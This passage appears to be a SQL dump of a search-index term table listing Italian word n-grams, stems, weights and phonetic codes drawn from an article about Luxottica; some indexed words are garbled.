americani',0,1,1.5,'D245625',1,'en'),(30121,'degli americani degli','degli americani degli',0,1,1.7,'D245625324',1,'en'),(30122,'degli asiatici','degli asiatici',0,1,1.4667,'D24232',1,'en'),(30123,'degli asiatici e','degli asiatici e',0,1,1.5333,'D24232',1,'en'),(30124,'degli europei','degli europei',0,1,1.4333,'D2461',1,'en'),(30125,'degli europei degli','degli europei degli',0,1,1.6333,'D2461324',1,'en'),(30126,'degli occhiali','degli occhiali',0,1,1.4667,'D2424',1,'en'),(30127,'degli occhiali da','degli occhiali da',0,1,1.5667,'D24243',1,'en'),(30128,'dei','dei',0,0,0.2,'D000',2,'en'),(30129,'dei 5','dei 5',0,1,1.1667,'D000',1,'en'),(30130,'dei 5 miliardi','dei 5 miliardi',0,1,1.4667,'D5463',1,'en'),(30131,'dei dati','dei dati',0,1,1.2667,'D000',1,'en'),(30132,'dei dati reperibili','dei dati reperibili',0,1,1.6333,'D61614',1,'en'),(30133,'dei punti','dei punti',0,1,1.3,'D153',1,'en'),(30134,'dei punti vendita','dei punti vendita',0,1,1.5667,'D153153',1,'en'),(30135,'del gruppo','del gruppo',0,1,1.3333,'D4261',1,'en'),(30136,'del gruppo fondato','del gruppo fondato',0,1,1.6,'D426153',1,'en'),(30137,'del gruppo gna','del gruppo gna',0,1,1.4667,'D426125',1,'en'),(30138,'del nord','del nord',0,1,1.2667,'D4563',1,'en'),(30139,'del nord the','del nord the',0,1,1.4,'D4563',1,'en'),(30140,'del vecchio','del vecchio',0,1,1.3667,'D412',1,'en'),(30141,'del vecchio e','del vecchio e',0,1,1.4333,'D412',1,'en'),(30142,'delegato','delegato',0,0,0.5333,'D423',1,'en'),(30143,'delegato del','delegato del',0,1,1.4,'D4234',1,'en'),(30144,'delegato del gruppo','delegato del gruppo',0,1,1.6333,'D4234261',1,'en'),(30145,'delete 13','delet 13',0,1,1.3,'D430',1,'en'),(30146,'delete 13 senza','delet 13 senza',0,1,1.5,'D43252',1,'en'),(30147,'delete 2006','delet 2006',0,1,1.3667,'D430',1,'en'),(30148,'delete 2006 è','delet 2006 è',0,1,1.4333,'D430',1,'en'),(30149,'delete giro','delet giro',0,1,1.3667,'D4326',1,'en'),(30150,'delete giro d\'','delet giro d',0,1,1.4667,'D43263',1,'en'),(30151,'delete lusso','delet lusso',0,1,1.4,'D4342',1,'en'),(30152,'delete lusso oppure','delet lusso oppure',0,1,1.6333,'D434216',1,'en'),(30153,'delete mondo','delet mondo',0,1,1.4,'D4353',1,'en'),(30154,'delete mondo luxottica','delet mondo luxottica',0,1,1.7333,'D43534232',1,'en'),(30155,'delete nostro','delet nostro',0,1,1.4333,'D435236',1,'en'),(30156,'delete nostro gruppo','delet nostro gruppo',0,1,1.6667,'D435236261',1,'en'),(30157,'delete primo','delet primo',0,1,1.4,'D43165',1,'en'),(30158,'delete primo anno','delet primo anno',0,1,1.5667,'D43165',1,'en'),(30159,'delete vecchio','delet vecchio',0,1,1.4667,'D4312',1,'en'),(30160,'delete vecchio abbiamo','delet vecchio abbiamo',0,1,1.7333,'D431215',1,'en'),(30161,'deletela','deletela',0,0,0.5333,'D434',1,'en'),(30162,'deletela macchina','deletela macchina',0,1,1.5667,'D434525',1,'en'),(30163,'deletela macchina operativa','deletela macchina operativa',0,1,1.9,'D4345251631',1,'en'),(30164,'dell\'','dell',0,0,0.3333,'D400',1,'en'),(30165,'dell\' anno','dell anno',0,1,1.3333,'D450',1,'en'),(30166,'dell\' anno è','dell anno è',0,1,1.4,'D450',1,'en'),(30167,'dell\' occhialeria','dell occhialeria',0,1,1.5667,'D4246',1,'en'),(30168,'dell\' occhialeria ma','dell occhialeria ma',0,1,1.6667,'D42465',1,'en'),(30169,'della nostra','della nostra',0,1,1.4,'D45236',1,'en'),(30170,'della nostra controllata','della nostra controllata',0,1,1.8,'D45236253643',1,'en'),(30171,'della teatralità','della teatralità',0,1,1.5333,'D43643',1,'en'),(30172,'della teatralità for','della teatralità for',0,1,1.6667,'D4364316',1,'en'),(30173,'delle dogane','dell dogane',0,1,1.4,'D4325',1,'en'),(30174,'delle dogane disadvantage','dell dogane disadvantage',0,1,1.8333,'D43253231532',1,'en'),(30175,'detto','detto',0,0,0.3333,'D000',1,'en'),(30176,'detto che','detto che',0,1,1.3,'D200',1,'en'),(30177,'detto che la','detto che la',0,1,1.4,'D240',1,'en'),(30178,'detto gna','detto gna',0,1,1.3,'D250',1,'en'),(30179,'detto gna vuole','detto gna vuole',0,1,1.5,'D2514',1,'en'),(30180,'deve','deve',0,0,0.2667,'D100',2,'en'),(30181,'deve limitarsi','deve limitarsi',0,1,1.4667,'D145362',1,'en'),(30182,'deve limitarsi a','deve limitarsi a',0,1,1.5333,'D145362',1,'en'),(30183,'devono','devono',0,0,0.4,'D150',1,'en'),(30184,'devono essere','devono essere',0,1,1.4333,'D1526',1,'en'),(30185,'devono essere grandi','devono essere grandi',0,1,1.6667,'D15262653',1,'en'),(30186,'di accogliere','di accogliere',0,1,1.4333,'D246',1,'en'),(30187,'di accogliere marchi','di accogliere marchi',0,1,1.6667,'D246562',1,'en'),(30188,'di andare','di andare',0,1,1.3,'D536',1,'en'),(30189,'di andare in','di andare in',0,1,1.4,'D5365',1,'en'),(30190,'di aziende','di aziende',0,1,1.3333,'D253',1,'en'),(30191,'di aziende medio','di aziende medio',0,1,1.5333,'D25353',1,'en'),(30192,'di cambio','di cambio',0,1,1.3,'D251',1,'en'),(30193,'di cambio influisce','di cambio influisce',0,1,1.6333,'D2515142',1,'en'),(30194,'di continuare','di continuare',0,1,1.4333,'D25356',1,'en'),(30195,'di continuare a','di continuare a',0,1,1.5,'D25356',1,'en'),(30196,'di cost','di cost',0,1,1.2333,'D230',1,'en'),(30197,'di cost errori','di cost errori',0,1,1.4667,'D236',1,'en'),(30198,'di cost nuove','di cost nuove',0,1,1.4333,'D2351',1,'en'),(30199,'di crescita','di crescita',0,1,1.3667,'D2623',1,'en'),(30200,'di crescita organica','di crescita organica',0,1,1.6667,'D26236252',1,'en'),(30201,'di crescita prima','di crescita prima',0,1,1.5667,'D2623165',1,'en'),(30202,'di do','di do',0,1,1.1667,'D000',1,'en'),(30203,'di do grandi','di do grandi',0,1,1.4,'D2653',1,'en'),(30204,'di fatturato','di fatturato',0,1,1.4,'D1363',1,'en'),(30205,'di fatturato andata','di fatturato andata',0,1,1.6333,'D136353',1,'en'),(30206,'di fatturato il','di fatturato il',0,1,1.5,'D13634',1,'en'),(30207,'di frequenti','di frequenti',0,1,1.4,'D16253',1,'en'),(30208,'di frequenti ma','di frequenti ma',0,1,1.5,'D162535',1,'en'),(30209,'di gestire','di gestire',0,1,1.3333,'D236',1,'en'),(30210,'di legge','di legge',0,1,1.2667,'D420',1,'en'),(30211,'di legge sulle','di legge sulle',0,1,1.4667,'D424',1,'en'),(30212,'di leonardo','di leonardo',0,1,1.3667,'D4563',1,'en'),(30213,'di leonardo delete','di leonardo delete',0,1,1.6,'D456343',1,'en'),(30214,'di licenza','di licenza',0,1,1.3333,'D4252',1,'en'),(30215,'di licenza con','di licenza con',0,1,1.4667,'D42525',1,'en'),(30216,'di luxottica','di luxottica',0,1,1.4,'D4232',1,'en'),(30217,'di luxottica di','di luxottica di',0,1,1.5,'D42323',1,'en'),(30218,'di luxottica è','di luxottica è',0,1,1.4667,'D4232',1,'en'),(30219,'di luxottica già','di luxottica già',0,1,1.5333,'D4232',1,'en'),(30220,'di negozi','di negozi',0,1,1.3,'D520',1,'en'),(30221,'di negozi all\'','di negozi all',0,1,1.4667,'D524',1,'en'),(30222,'di negozi che','di negozi che',0,1,1.4333,'D520',1,'en'),(30223,'di ogni','di ogni',0,1,1.2333,'D250',1,'en'),(30224,'di ogni altro','di ogni altro',0,1,1.4333,'D25436',1,'en'),(30225,'di pensare','di pensare',0,1,1.3333,'D1526',1,'en'),(30226,'di pensare gna','di pensare gna',0,1,1.4667,'D152625',1,'en'),(30227,'di piccole','di piccole',0,1,1.3333,'D124',1,'en'),(30228,'di piccole e','di piccole e',0,1,1.4,'D124',1,'en'),(30229,'di più','di più',0,1,1.2,'D100',1,'en'),(30230,'di più alla','di più alla',0,1,1.3667,'D140',1,'en'),(30231,'di punta','di punta',0,1,1.2667,'D153',1,'en'),(30232,'di punta assolutamente','di punta assolutamente',0,1,1.7333,'D15324353',1,'en'),(30233,'di questo','di questo',0,1,1.3,'D230',1,'en'),(30234,'di questo genere','di questo genere',0,1,1.5333,'D23256',1,'en'),(30235,'di rcs','di rcs',0,1,1.2,'D620',1,'en'),(30236,'di rcs chi','di rcs chi',0,1,1.3333,'D620',1,'en'),(30237,'di realizzare','di realizzare',0,1,1.4333,'D6426',1,'en'),(30238,'di realizzare una','di realizzare una',0,1,1.5667,'D64265',1,'en'),(30239,'di riutilizzo','di riutilizzo',0,1,1.4333,'D6342',1,'en'),(30240,'di riutilizzo at','di riutilizzo at',0,1,1.5333,'D63423',1,'en'),(30241,'di sale','di sale',0,1,1.2333,'D240',1,'en'),(30242,'di sale possibili','di sale possibili',0,1,1.5667,'D241214',1,'en'),(30243,'di service','di service',0,1,1.3333,'D2612',1,'en'),(30244,'di service un','di service un',0,1,1.4333,'D26125',1,'en'),(30245,'di sfide','di sfide',0,1,1.2667,'D213',1,'en'),(30246,'di sfide penso','di sfide penso',0,1,1.4667,'D213152',1,'en'),(30247,'di sperimentarsi','di sperimentarsi',0,1,1.5333,'D2165362',1,'en'),(30248,'di sperimentarsi in','di sperimentarsi in',0,1,1.6333,'D21653625',1,'en'),(30249,'di titolarità','di titolarità',0,1,1.4333,'D463',1,'en'),(30250,'di titolarità di','di titolarità di',0,1,1.5333,'D463',1,'en'),(30251,'dieci','dieci',0,0,0.3333,'D200',1,'en'),(30252,'dieci vent\'','dieci vent',0,1,1.3667,'D2153',1,'en'),(30253,'dieci vent\' anni','dieci vent anni',0,1,1.5333,'D21535',1,'en'),(30254,'difficilat','difficilat',0,0,0.6667,'D1243',1,'en'),(30255,'difficilat lei','difficilat lei',0,1,1.4667,'D12434',1,'en'),(30256,'difficilat lei sostiene','difficilat lei sostiene',0,1,1.7667,'D12434235',1,'en'),(30257,'difficile','difficil',0,0,0.6,'D124',1,'en'),(30258,'difficile e','difficil e',0,1,1.3667,'D124',1,'en'),(30259,'difficile e da','difficil e da',0,1,1.4667,'D1243',1,'en'),(30260,'difficile immaginare','difficil immaginare',0,1,1.6667,'D1245256',1,'en'),(30261,'difficile immaginare una','difficil immaginare una',0,1,1.8,'D12452565',1,'en'),(30262,'dimensione','dimension',0,0,0.6667,'D525',1,'en'),(30263,'dimensione rilevante','dimension rilevante',0,1,1.6667,'D52564153',1,'en'),(30264,'dimensione rilevante abbiamo','dimension rilevante abbiamo',0,1,1.9333,'D5256415315',1,'en'),(30265,'dimostrata','dimostrata',0,0,0.6667,'D52363',1,'en'),(30266,'dimostrata di','dimostrata di',0,1,1.4333,'D52363',1,'en'),(30267,'dimostrata di luxottica','dimostrata di luxottica',0,1,1.7667,'D523634232',1,'en'),(30268,'dipinta','dipinta',0,0,0.4667,'D153',1,'en'),(30269,'dipinta prima','dipinta prima',0,1,1.4333,'D153165',1,'en'),(30270,'dipinta prima originate','dipinta prima originate',0,1,1.7667,'D1531656253',1,'en'),(30271,'director anche','director anche',0,1,1.4667,'D623652',1,'en'),(30272,'director anche tra','director anche tra',0,1,1.6,'D62365236',1,'en'),(30273,'direzione','direzion',0,0,0.6,'D625',1,'en'),(30274,'direzione e','direzion e',0,1,1.3667,'D625',1,'en'),(30275,'direzione e altri','direzion e altri',0,1,1.5667,'D625436',1,'en'),(30276,'diritto','diritto',0,0,0.4667,'D630',1,'en'),(30277,'diritto di','diritto di',0,1,1.3333,'D630',1,'en'),(30278,'diritto di legge','diritto di legge',0,1,1.5333,'D6342',1,'en'),(30279,'disadvantage','disadvantag',0,0,0.8,'D231532',2,'en'),(30280,'disadvantage i','disadvantag i',0,1,1.4667,'D231532',2,'en'),(30281,'disadvantage i permessi','disadvantag i permessi',0,1,1.7667,'D2315321652',1,'en'),(30282,'disadvantage il','disadvantag il',0,1,1.5,'D2315324',1,'en'),(30283,'disadvantage il traguardo','disadvantag il traguardo',0,1,1.8333,'D231532436263',1,'en'),(30284,'disadvantage una','disadvantag una',0,1,1.5333,'D2315325',1,'en'),(30285,'disadvantage una certa','disadvantag una certa',0,1,1.7333,'D2315325263',1,'en'),(30286,'distintivo','distintivo',0,0,0.6667,'D23531',1,'en'),(30287,'distintivo di','distintivo di',0,1,1.4333,'D235313',1,'en'),(30288,'distintivo di titolarità','distintivo di titolarità',0,1,1.8,'D235313463',1,'en'),(30289,'distrarsi','distrarsi',0,0,0.6,'D2362',1,'en'),(30290,'distrarsi qual','distrarsi qual',0,1,1.4667,'D23624',1,'en'),(30291,'distrarsi qual è','distrarsi qual è',0,1,1.5333,'D23624',1,'en'),(30292,'diversificazione','diversificazion',0,0,1,'D162125',1,'en'),(30293,'diversificazione di','diversificazion di',0,1,1.6333,'D1621253',1,'en'),(30294,'diversificazione di questo','diversificazion di questo',0,1,1.8667,'D162125323',1,'en'),(30295,'diversificazione geografica','diversificazion geografica',0,1,1.9,'D1621252612',1,'en'),(30296,'diversificazione geografica il','diversificazion geografica il',0,1,2,'D16212526124',1,'en'),(30297,'diversità','diversità',0,0,0.6,'D1623',1,'en'),(30298,'diversità e','diversità e',0,1,1.3667,'D1623',1,'en'),(30299,'diversità e sapere','diversità e sapere',0,1,1.6,'D1623216',1,'en'),(30300,'dna','dna',0,0,0.2,'D500',2,'en'),(30301,'dna legato','dna legato',0,1,1.3333,'D5423',1,'en'),(30302,'dna legato al','dna legato al',0,1,1.4333,'D54234',1,'en'),(30303,'do grandi','do grandi',0,1,1.3,'D2653',1,'en'),(30304,'do grandi acquisizioni','do grandi acquisizioni',0,1,1.7333,'D265325',1,'en'),(30305,'dobbas','dobba',0,0,0.4,'D120',1,'en'),(30306,'dobbas simply','dobba simply',0,1,1.4333,'D12514',1,'en'),(30307,'dobbas simply put','dobba simply put',0,1,1.5667,'D1251413',1,'en'),(30308,'dobbiamo','dobbiamo',0,0,0.5333,'D150',1,'en'),(30309,'dobbiamo avere','dobbiamo avere',0,1,1.4667,'D1516',1,'en'),(30310,'dobbiamo avere un','dobbiamo avere un',0,1,1.5667,'D15165',1,'en'),(30311,'dobbiamo averli','dobbiamo averli',0,1,1.5,'D15164',1,'en'),(30312,'dobbiamo averli in','dobbiamo averli in',0,1,1.6,'D151645',1,'en'),(30313,'dobbiamo averlo','dobbiamo averlo',0,1,1.5,'D15164',1,'en'),(30314,'dobbiamo averlo in','dobbiamo averlo in',0,1,1.6,'D151645',1,'en'),(30315,'dobbiamo curare','dobbiamo curare',0,1,1.5,'D1526',1,'en'),(30316,'dobbiamo curare chi','dobbiamo curare chi',0,1,1.6333,'D15262',1,'en'),(30317,'dobbiamo focus','dobbiamo focus',0,1,1.4667,'D1512',1,'en'),(30318,'dobbiamo focus molto','dobbiamo focus molto',0,1,1.6667,'D1512543',1,'en'),(30319,'documentamo','documentamo',0,0,0.7333,'D2535',1,'en'),(30320,'documentamo trovare','documentamo trovare',0,1,1.6333,'D25353616',1,'en'),(30321,'documentamo trovare means','documentamo trovare means',0,1,1.8333,'D2535361652',1,'en'),(30322,'dogane','dogan',0,0,0.4,'D250',1,'en'),(30323,'dogane disadvantage','dogan disadvantage',0,1,1.6333,'D253231532',1,'en'),(30324,'dogane disadvantage i','dogan disadvantage i',0,1,1.7,'D253231532',1,'en'),(30325,'doing','do',0,0,0.3333,'D520',2,'en'),(30326,'doing questa','do questa',0,1,1.4,'D523',1,'en'),(30327,'doing questa direzione','do questa direzione',0,1,1.7333,'D523625',1,'en'),(30328,'dolce','dolc',0,0,0.3333,'D420',1,'en'),(30329,'dolce gabbana','dolc gabbana',0,1,1.4333,'D4215',1,'en'),(30330,'dolce gabbana erano','dolc gabbana erano',0,1,1.6333,'D421565',1,'en'),(30331,'dollari','dollari',0,0,0.4667,'D460',1,'en'),(30332,'dollari e','dollari e',0,1,1.3,'D460',1,'en'),(30333,'dollari e quindi','dollari e quindi',0,1,1.5333,'D46253',1,'en'),(30334,'dollari ma','dollari ma',0,1,1.3333,'D465',1,'en'),(30335,'dollari ma cinque','dollari ma cinque',0,1,1.5667,'D465252',1,'en'),(30336,'e air','e air',0,1,1.1667,'E600',1,'en'),(30337,'e air travel','e air travel',0,1,1.4,'E63614',1,'en'),(30338,'e allo','e allo',0,1,1.2,'E400',1,'en'),(30339,'e allo sport','e allo sport',0,1,1.4,'E42163',1,'en'),(30340,'e altri','e altri',0,1,1.2333,'E436',1,'en'),(30341,'e altri ne','e altri ne',0,1,1.3333,'E4365',1,'en'),(30342,'è are','è are',0,1,1.1667,'è600',1,'en'),(30343,'è are generally','è are generally',0,1,1.5,'è62564',1,'en'),(30344,'è bene','è bene',0,1,1.2,'è150',1,'en'),(30345,'è bene un','è bene un',0,1,1.3,'è150',1,'en'),(30346,'e censilidati','e censilidati',0,1,1.4333,'E25243',1,'en'),(30347,'e censilidati entrambi','e censilidati entrambi',0,1,1.7333,'E2524353651',1,'en'),(30348,'e che','e che',0,1,1.1667,'E200',1,'en'),(30349,'è che nel','è che nel',0,1,1.3,'è254',1,'en'),(30350,'e che sappiano','e che sappiano',0,1,1.4667,'E215',1,'en'),(30351,'è chi','è chi',0,1,1.1667,'è200',1,'en'),(30352,'è chi dalla','è chi dalla',0,1,1.3667,'è234',1,'en'),(30353,'e chief','e chief',0,1,1.2333,'E210',1,'en'),(30354,'e chief mondiale','e chief mondiale',0,1,1.5333,'E21534',1,'en'),(30355,'è comprare','è comprare',0,1,1.3333,'è2516',1,'en'),(30356,'è comprare qualche','è comprare qualche',0,1,1.6,'è2516242',1,'en'),(30357,'è cresciuta','è cresciuta',0,1,1.3667,'è2623',1,'en'),(30358,'è cresciuta in','è cresciuta in',0,1,1.4667,'è26235',1,'en'),(30359,'e da','e da',0,1,1.1333,'E300',1,'en'),(30360,'e da poco','e da poco',0,1,1.3,'E312',1,'en'),(30361,'e da qualche','e da qualche',0,1,1.4,'E3242',1,'en'),(30362,'è davvelectronicro','è davvelectronicro',0,1,1.6,'è314236526',1,'en'),(30363,'è davvelectronicro difficilat','è davvelectronicro difficilat',0,1,1.9667,'è31423652631243',1,'en'),(30364,'è difficile','è difficile',0,1,1.3667,'è3124',1,'en'),(30365,'è difficile immaginare','è difficile immaginare',0,1,1.7333,'è31245256',1,'en'),(30366,'è evidente','è evidente',0,1,1.3333,'è1353',1,'en'),(30367,'è evidente aggiunge','è evidente aggiunge',0,1,1.6333,'è1353252',1,'en'),(30368,'è fatta','è fatta',0,1,1.2333,'è130',1,'en'),(30369,'è fatta di','è fatta di',0,1,1.3333,'è130',1,'en'),(30370,'e forma','e forma',0,1,1.2333,'E165',1,'en'),(30371,'e forma dei','e forma dei',0,1,1.3667,'E1653',1,'en'),(30372,'è il consuntivo','è il consuntivo',0,1,1.5,'è4252531',1,'en'),(30373,'e il lusso','e il lusso',0,1,1.3333,'E420',1,'en'),(30374,'è il mercato','è il mercato',0,1,1.4,'è45623',1,'en'),(30375,'è in','è in',0,1,1.1333,'è500',1,'en'),(30376,'è in dollari','è in dollari',0,1,1.4,'è5346',1,'en'),(30377,'è la grande','è la grande',0,1,1.3667,'è42653',1,'en'),(30378,'e la riproduzione','e la riproduzione',0,1,1.5667,'E4616325',1,'en'),(30379,'e marketing','e marketing',0,1,1.3667,'E562352',1,'en'),(30380,'e marketing and','e marketing and',0,1,1.5,'E56235253',1,'en'),(30381,'e medie','e medie',0,1,1.2333,'E530',1,'en'),(30382,'e medie acquisizioni','e medie acquisizioni',0,1,1.6667,'E5325',1,'en'),(30383,'e non','e non',0,1,1.1667,'E500',1,'en'),(30384,'e non single','e non single',0,1,1.4,'E52524',1,'en'),(30385,'è not','è not',0,1,1.1667,'è530',2,'en'),(30386,'è not lavoro','è not lavoro',0,1,1.4,'è53416',1,'en'),(30387,'e o','e o',0,1,1.1,'E000',1,'en'),(30388,'e o interne','e o interne',0,1,1.3667,'E5365',1,'en'),(30389,'e piccolissime','e piccolissime',0,1,1.4667,'E12425',1,'en'),(30390,'e piccolissime imprese','e piccolissime imprese',0,1,1.7333,'E12425162',1,'en'),(30391,'è piccolo','è piccolo',0,1,1.3,'è124',1,'en'),(30392,'è piccolo non','è piccolo non',0,1,1.4333,'è1245',1,'en'),(30393,'è più','è più',0,1,1.1667,'è100',1,'en'),(30394,'è più facile','è più facile',0,1,1.4,'è124',1,'en'),(30395,'è quella','è quella',0,1,1.2667,'è240',1,'en'),(30396,'è quella di','è quella di',0,1,1.3667,'è243',1,'en'),(30397,'e questo','e questo',0,1,1.2667,'E230',1,'en'),(30398,'e questo ci','e questo ci',0,1,1.3667,'E232',1,'en'),(30399,'e quindi','e quindi',0,1,1.2667,'E253',1,'en'),(30400,'e quindi il','e quindi il',0,1,1.3667,'E2534',1,'en'),(30401,'e sapere','e sapere',0,1,1.2667,'E216',1,'en'),(30402,'e sapere includere','e sapere includere',0,1,1.6,'E21652436',1,'en'),(30403,'e si','e si',0,1,1.1333,'E200',1,'en'),(30404,'e si debba','e si debba',0,1,1.3333,'E231',1,'en'),(30405,'è sicuramente','è sicuramente',0,1,1.4333,'è2653',1,'en'),(30406,'è sicuramente la','è sicuramente la',0,1,1.5333,'è26534',1,'en'),(30407,'e sono','e sono',0,1,1.2,'E250',1,'en'),(30408,'e sono pertanto','e sono pertanto',0,1,1.5,'E2516353',1,'en'),(30409,'è stata','è stata',0,1,1.2333,'è230',1,'en'),(30410,'è stata aver','è stata aver',0,1,1.4,'è2316',1,'en'),(30411,'è stata dipinta','è stata dipinta',0,1,1.5,'è23153',1,'en'),(30412,'è stato','è stato',0,1,1.2333,'è230',1,'en'),(30413,'è stato più','è stato più',0,1,1.3667,'è231',1,'en'),(30414,'e subito','e subito',0,1,1.2667,'E213',1,'en'),(30415,'e subito mother','e subito mother',0,1,1.5,'E213536',1,'en'),(30416,'e the','e the',0,1,1.1667,'E300',1,'en'),(30417,'e the opportunità','e the opportunità',0,1,1.5667,'E316353',1,'en'),(30418,'è un','è un',0,1,1.1333,'è500',1,'en'),(30419,'è un mercato','è un mercato',0,1,1.4,'è5623',1,'en'),(30420,'è un risultato','è un risultato',0,1,1.4667,'è56243',1,'en'),(30421,'è una realtà','è una realtà',0,1,1.4,'è5643',1,'en'),(30422,'e una rete','e una rete',0,1,1.3333,'E563',1,'en'),(30423,'e una verticalizzazione','e una verticalizzazione',0,1,1.7667,'E51632425',1,'en'),(30424,'e veloci','e veloci',0,1,1.2667,'E142',1,'en'),(30425,'e veloci penso','e veloci penso',0,1,1.4667,'E142152',1,'en'),(30426,'each 50','each 50',0,1,1.2333,'E200',1,'en'),(30427,'each 50 anni','each 50 anni',0,1,1.4,'E250',1,'en'),(30428,'each questo','each questo',0,1,1.3667,'E230',1,'en'),(30429,'each questo noi','each questo noi',0,1,1.5,'E235',1,'en'),(30430,'each ralph','each ralph',0,1,1.3333,'E2641',1,'en'),(30431,'each ralph lauren','each ralph lauren',0,1,1.5667,'E2641465',1,'en'),(30432,'easy e','easi e',0,1,1.2,'E200',1,'en'),(30433,'easy e allo','easi e allo',0,1,1.3667,'E240',1,'en'),(30434,'economico','economico',0,0,0.6,'E252',1,'en'),(30435,'economico grazie','economico grazie',0,1,1.5333,'E25262',1,'en'),(30436,'economico grazie all\'','economico grazie all',0,1,1.7,'E252624',1,'en'),(30437,'ed è','ed è',0,1,1.1333,'E300',1,'en'),(30438,'ed è una','ed è una',0,1,1.2667,'E350',1,'en'),(30439,'ed età','ed età',0,1,1.2,'E300',1,'en'),(30440,'ed età various','ed età various',0,1,1.4667,'E3162',1,'en'),(30441,'emergenti','emergenti',0,0,0.6,'E56253',1,'en'),(30442,'emergenti e','emergenti e',0,1,1.3667,'E56253',1,'en'),(30443,'emergenti e censilidati','emergenti e censilidati',0,1,1.7667,'E5625325243',1,'en'),(30444,'entrambi','entrambi',0,0,0.5333,'E53651',1,'en'),(30445,'entrambi ha','entrambi ha',0,1,1.3667,'E53651',1,'en'),(30446,'entrambi ha detto','entrambi ha detto',0,1,1.5667,'E536513',1,'en'),(30447,'erano','erano',0,0,0.3333,'E650',1,'en'),(30448,'erano 4','erano 4',0,1,1.2333,'E650',1,'en'),(30449,'erano 4 3','erano 4 3',0,1,1.3,'E650',1,'en'),(30450,'erano attesi','erano attesi',0,1,1.4,'E6532',1,'en'),(30451,'erano attesi 120','erano attesi 120',0,1,1.5333,'E6532',1,'en'),(30452,'errori','errori',0,0,0.4,'E600',1,'en'),(30453,'errori considerata','errori considerata',0,1,1.6,'E6252363',1,'en'),(30454,'errori considerata chicago','errori considerata chicago',0,1,1.8667,'E62523632',1,'en'),(30455,'esclusiva','esclusiva',0,0,0.6,'E2421',1,'en'),(30456,'esclusiva a','esclusiva a',0,1,1.3667,'E2421',1,'en'),(30457,'esclusiva a rcs','esclusiva a rcs',0,1,1.5,'E242162',1,'en'),(30458,'esempio','esempio',0,0,0.4667,'E251',1,'en'),(30459,'esempio rayban','esempio rayban',0,1,1.4667,'E251615',1,'en'),(30460,'esempio rayban il','esempio rayban il',0,1,1.5667,'E2516154',1,'en'),(30461,'esigenze','esigenz',0,0,0.5333,'E252',1,'en'),(30462,'esigenze of','esigenz of',0,1,1.3667,'E2521',1,'en'),(30463,'esigenze of thesonali','esigenz of thesonali',0,1,1.7,'E25213254',1,'en'),(30464,'esista','esista',0,0,0.4,'E230',1,'en'),(30465,'esista un','esista un',0,1,1.3,'E235',1,'en'),(30466,'esista un grande','esista un grande',0,1,1.5333,'E2352653',1,'en'),(30467,'esista una','esista una',0,1,1.3333,'E235',1,'en'),(30468,'esista una tiongkok','esista una tiongkok',0,1,1.6333,'E235352',1,'en'),(30469,'espandere','espander',0,0,0.6,'E21536',1,'en'),(30470,'espandere poi','espander poi',0,1,1.4333,'E215361',1,'en'),(30471,'espandere poi abbiamo','espander poi abbiamo',0,1,1.7,'E2153615',1,'en'),(30472,'esperienza','esperienza',0,0,0.6667,'E21652',1,'en'),(30473,'esperienza con','esperienza con',0,1,1.4667,'E216525',1,'en'),(30474,'esperienza con i','esperienza con i',0,1,1.5333,'E216525',1,'en'),(30475,'essere','esser',0,0,0.4,'E260',1,'en'),(30476,'essere director','esser director',0,1,1.5,'E2636236',1,'en'),(30477,'essere director anche','esser director anche',0,1,1.7,'E263623652',1,'en'),(30478,'essere grandi','esser grandi',0,1,1.4333,'E262653',1,'en'),(30479,'essere grandi qual','esser grandi qual',0,1,1.6,'E26265324',1,'en'),(30480,'età','età',0,0,0.2,'E300',1,'en'),(30481,'età various','età various',0,1,1.3667,'E3162',1,'en'),(30482,'età various oltre','età various oltre',0,1,1.5667,'E3162436',1,'en'),(30483,'europei','europei',0,0,0.4667,'E610',1,'en'),(30484,'europei degli','europei degli',0,1,1.4333,'E61324',1,'en'),(30485,'europei degli americani','europei degli americani',0,1,1.7667,'E613245625',1,'en'),(30486,'every attrarre','everi attrarre',0,1,1.4667,'E1636',1,'en'),(30487,'every attrarre il','everi attrarre il',0,1,1.5667,'E16364',1,'en'),(30488,'every esempio','everi esempio',0,1,1.4333,'E16251',1,'en'),(30489,'every esempio rayban','everi esempio rayban',0,1,1.6667,'E16251615',1,'en'),(30490,'every gli','everi gli',0,1,1.3,'E1624',1,'en'),(30491,'every gli occhiali','everi gli occhiali',0,1,1.6,'E162424',1,'en'),(30492,'every il','everi il',0,1,1.2667,'E164',1,'en'),(30493,'every il settore','everi il settore',0,1,1.5333,'E164236',1,'en'),(30494,'evidente','evident',0,0,0.5333,'E1353',1,'en'),(30495,'evidente aggiunge','evident aggiunge',0,1,1.5667,'E1353252',1,'en'),(30496,'evidente aggiunge gna','evident aggiunge gna',0,1,1.7,'E13532525',1,'en'),(30497,'exact','exact',0,0,0.3333,'E230',2,'en'),(30498,'exact comunque','exact comunque',0,1,1.4667,'E23252',1,'en'),(30499,'exact comunque the','exact comunque the',0,1,1.6,'E232523',1,'en'),(30500,'fa','fa',0,0,0.1333,'F000',2,'en'),(30501,'fa erano','fa erano',0,1,1.2667,'F650',1,'en'),(30502,'fa erano 4','fa erano 4',0,1,1.3333,'F650',1,'en'),(30503,'fa questa','fa questa',0,1,1.3,'F230',1,'en'),(30504,'fa questa percentuale','fa questa percentuale',0,1,1.7,'F23162534',1,'en'),(30505,'fa scaturire','fa scaturire',0,1,1.4,'F236',1,'en'),(30506,'fa scaturire marchi','fa scaturire marchi',0,1,1.6333,'F236562',1,'en'),(30507,'facendo','facendo',0,0,0.4667,'F253',1,'en'),(30508,'facendo il','facendo il',0,1,1.3333,'F2534',1,'en'),(30509,'facendo il passo','facendo il passo',0,1,1.5333,'F253412',1,'en'),(30510,'facendo n\'t','facendo n',0,1,1.3667,'F25353',1,'en'),(30511,'facendo n\'t grande','facendo n grande',0,1,1.6,'F253532653',1,'en'),(30512,'facile','facil',0,0,0.4,'F240',1,'en'),(30513,'facile mother','facil mother',0,1,1.4333,'F24536',1,'en'),(30514,'facile mother anche','facil mother anche',0,1,1.6333,'F2453652',1,'en'),(30515,'faremo','faremo',0,0,0.4,'F650',1,'en'),(30516,'faremo quest\'','faremo quest',0,1,1.4333,'F6523',1,'en'),(30517,'faremo quest\' anno','faremo quest anno',0,1,1.6,'F65235',1,'en'),(30518,'farlo','farlo',0,0,0.3333,'F640',1,'en'),(30519,'farlo regarding','farlo regarding',0,1,1.5,'F64626352',1,'en'),(30520,'farlo regarding esigenze','farlo regarding esigenze',0,1,1.8,'F6462635252',1,'en'),(30521,'fase','fase',0,0,0.2667,'F200',1,'en'),(30522,'fase di','fase 